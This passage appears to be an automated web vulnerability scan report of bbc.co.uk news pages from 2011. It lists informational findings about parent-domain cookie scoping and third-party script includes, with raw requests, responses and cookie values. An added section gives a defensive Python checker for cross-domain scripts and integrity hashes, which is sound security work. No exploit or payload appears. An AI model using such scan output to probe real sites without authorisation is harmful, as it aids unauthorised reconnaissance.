Set-Cookie: BBC-UID=746da525aeaaf6db3b2a800d01a25310c57ea53000b0317a644b9a840c2e982e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=746da525aeaaf6db3b2a800d01a25310c57ea53000b0317a644b9a840c2e982e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.89. http://www.bbc.co.uk/news/world-south-asia-12437087

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12437087

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-south-asia-12437087 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:24 GMT
Keep-Alive: timeout=10, max=779
Expires: Sat, 12 Feb 2011 02:03:24 GMT
Connection: close
Set-Cookie: BBC-UID=94fd85e52efaf66cdad85d7f6173bc049bd8432170e091195b5b625c6d057ffc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:24 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=94fd85e52efaf66cdad85d7f6173bc049bd8432170e091195b5b625c6d057ffc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.90. http://www.bbc.co.uk/news/world-us-canada-12411274

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12411274

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-us-canada-12411274 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:25 GMT
Keep-Alive: timeout=10, max=711
Expires: Sat, 12 Feb 2011 02:03:25 GMT
Connection: close
Set-Cookie: BBC-UID=744db5b56eaa063d8b5b6a6ab17fdd52d231ebbc7010c1297bab929d842f611e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=744db5b56eaa063d8b5b6a6ab17fdd52d231ebbc7010c1297bab929d842f611e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:25 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.91. http://www.bbc.co.uk/news/world-us-canada-12435117

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12435117

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-us-canada-12435117 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:26 GMT
Keep-Alive: timeout=10, max=796
Expires: Sat, 12 Feb 2011 02:03:26 GMT
Connection: close
Set-Cookie: BBC-UID=748d25750e6ad6fe495dfa25f13571f953b915d36010812a147b3ae482dc4baa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:26 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=748d25750e6ad6fe495dfa25f13571f953b915d36010812a147b3ae482dc4baa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:26 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.92. http://www.bbc.co.uk/news/world-us-canada-12436383

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12436383

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-us-canada-12436383 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=741
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=b4ad55657efa36cfba5dc7d9515c15bb807de6ef3010618a849b0a34e48c4fd80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4ad55657efa36cfba5dc7d9515c15bb807de6ef3010618a849b0a34e48c4fd80Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56924

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.93. http://www.bbc.co.uk/news/world-us-canada-12437116

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437116

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-us-canada-12437116 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:27 GMT
Keep-Alive: timeout=10, max=795
Expires: Sat, 12 Feb 2011 02:03:27 GMT
Connection: close
Set-Cookie: BBC-UID=04add535ae8aa68f5b2a628621fedf879dc87227d020711a748bba040cae588e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=04add535ae8aa68f5b2a628621fedf879dc87227d020711a748bba040cae588e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 68875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

2.94. http://www.bbc.co.uk/news/world-us-canada-12437121

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-us-canada-12437121

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/world-us-canada-12437121 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:28 GMT
Keep-Alive: timeout=10, max=772
Expires: Sat, 12 Feb 2011 02:03:28 GMT
Connection: close
Set-Cookie: BBC-UID=e46dd5159e4a37801b1bab7d615fbabda100be42f03071f95b6bf2edc46ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e46dd5159e4a37801b1bab7d615fbabda100be42f03071f95b6bf2edc46ff13e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:28 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...

3. Cross-domain script include
There are 58 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
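The check behind this finding, written out as an added example (this is not code from the scanner or from the site being tested): collect every script src in a response, resolve it against the page URL, and flag those whose registrable domain differs from the page's. Two things worth knowing before reading the 58 instances below. First, the comparison is purely by domain, so a CDN the same operator runs under a different registrable domain (the bbcimg.co.uk hosts in these responses) is reported alongside genuine third parties such as js.revsci.net and edge.quantserve.com; the report cannot tell you which is which, so triage each host by who controls it. Second, the remediation above predates Subresource Integrity; where a script must stay on a third-party host, an integrity attribute pins it to a known hash, and the helper at the end computes that value. The public-suffix table is a constructed stub covering only the suffixes seen here, and the sample HTML is modelled on the script tags in the responses below with two made-up same-site includes added to show what is not flagged.

```python
"""Added example: detect cross-domain <script src> includes, plus an SRI value."""
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed, partial public-suffix table (assumption): enough for the hosts in
# this report. A production check should use the full Public Suffix List.
MULTI_LABEL_SUFFIXES = {"co.uk", "org.uk", "ac.uk", "gov.uk", "com.au"}


def registrable_domain(host):
    """'www.bbc.co.uk' -> 'bbc.co.uk', 'edge.quantserve.com' -> 'quantserve.com'."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag; inline scripts are skipped."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value)


def cross_domain_scripts(html, page_url):
    """Return [(src, host)] for script includes served from a registrable domain
    other than the page's. Relative and protocol-relative srcs are resolved
    against page_url first, so '/local.js' and '//cdn.example' are handled."""
    parser = ScriptSrcCollector()
    parser.feed(html)
    page_domain = registrable_domain(urlsplit(page_url).hostname)
    found = []
    for src in parser.srcs:
        host = urlsplit(urljoin(page_url, src)).hostname
        if host and registrable_domain(host) != page_domain:
            found.append((src, host))
    return found


def sri_integrity(script_bytes):
    """integrity= value (sha384) for a script body you have reviewed and want to pin."""
    digest = hashlib.sha384(script_bytes).digest()
    return "sha384-" + base64.b64encode(digest).decode("ascii")


# Constructed sample: the third-party tags mirror the responses in this report;
# the local.js and static.bbc.co.uk lines are made up to show same-site includes.
SAMPLE_HTML = """
<script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"></script>
<script type="text/javascript" src="/js/own/local.js"></script>
<script type="text/javascript" src="//static.bbc.co.uk/frameworks/barlesque/1.6.0/bootstrap.js"></script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<script type="text/javascript">inline();</script>
"""

if __name__ == "__main__":
    page = "http://www.bbc.co.uk/news/business-12434447"
    for src, host in cross_domain_scripts(SAMPLE_HTML, page):
        print(f"{host:24s} {src}")
    # Pin a reviewed copy of a third-party script instead of trusting the host.
    print(sri_integrity(b"/* reviewed script body */"))
```

The domain comparison deliberately uses the registrable domain rather than the full host: a script on news.bbcimg.co.uk is as far outside www.bbc.co.uk's origin as one on quantserve.com, and the browser grants both the same access to the page. Whether that matters depends on who operates the host, which is the judgement this check leaves to you.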


3.1. http://www.bbc.co.uk/news/business-12434447

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434447

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/business-12434447 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:41 GMT
Keep-Alive: timeout=10, max=799
Expires: Sat, 12 Feb 2011 02:02:41 GMT
Connection: close
Set-Cookie: BBC-UID=64bd35b5be1a2451bb6ac905c17515c4f5a62e8d605021c9db6b823df4bfa14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64bd35b5be1a2451bb6ac905c17515c4f5a62e8d605021c9db6b823df4bfa14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.2. http://www.bbc.co.uk/news/business-12434453

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434453

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/business-12434453 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:41 GMT
Keep-Alive: timeout=10, max=702
Expires: Sat, 12 Feb 2011 02:02:41 GMT
Connection: close
Set-Cookie: BBC-UID=241df5c5fecad461db9800b6d10078be2f9b53e5e05041094bfbb38feb74d29e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=241df5c5fecad461db9800b6d10078be2f9b53e5e05041094bfbb38feb74d29e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.3. http://www.bbc.co.uk/news/business-12435838

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12435838

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/business-12435838 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:41 GMT
Keep-Alive: timeout=10, max=728
Expires: Sat, 12 Feb 2011 02:02:41 GMT
Connection: close
Set-Cookie: BBC-UID=842df5b5fe4a64112b081720f1e94d44da451b35c0c0919a44bbdac51bc1dc0a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=842df5b5fe4a64112b081720f1e94d44da451b35c0c0919a44bbdac51bc1dc0a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:41 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.4. http://www.bbc.co.uk/news/business-12437194

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12437194

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/business-12437194 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=788
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=84ed75851e1a84234b69db6e31e13e57fb1510d1a060210a14bb8ae4521cd4000Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=84ed75851e1a84234b69db6e31e13e57fb1510d1a060210a14bb8ae4521cd4000Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64144

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.5. http://www.bbc.co.uk/news/education-12429152

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/education-12429152

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/education-12429152 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=765
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=44bd05d56ebaf4a33ba92238910beaabe4315fc1f040913a240b3ad4c15c429c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44bd05d56ebaf4a33ba92238910beaabe4315fc1f040913a240b3ad4c15c429c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
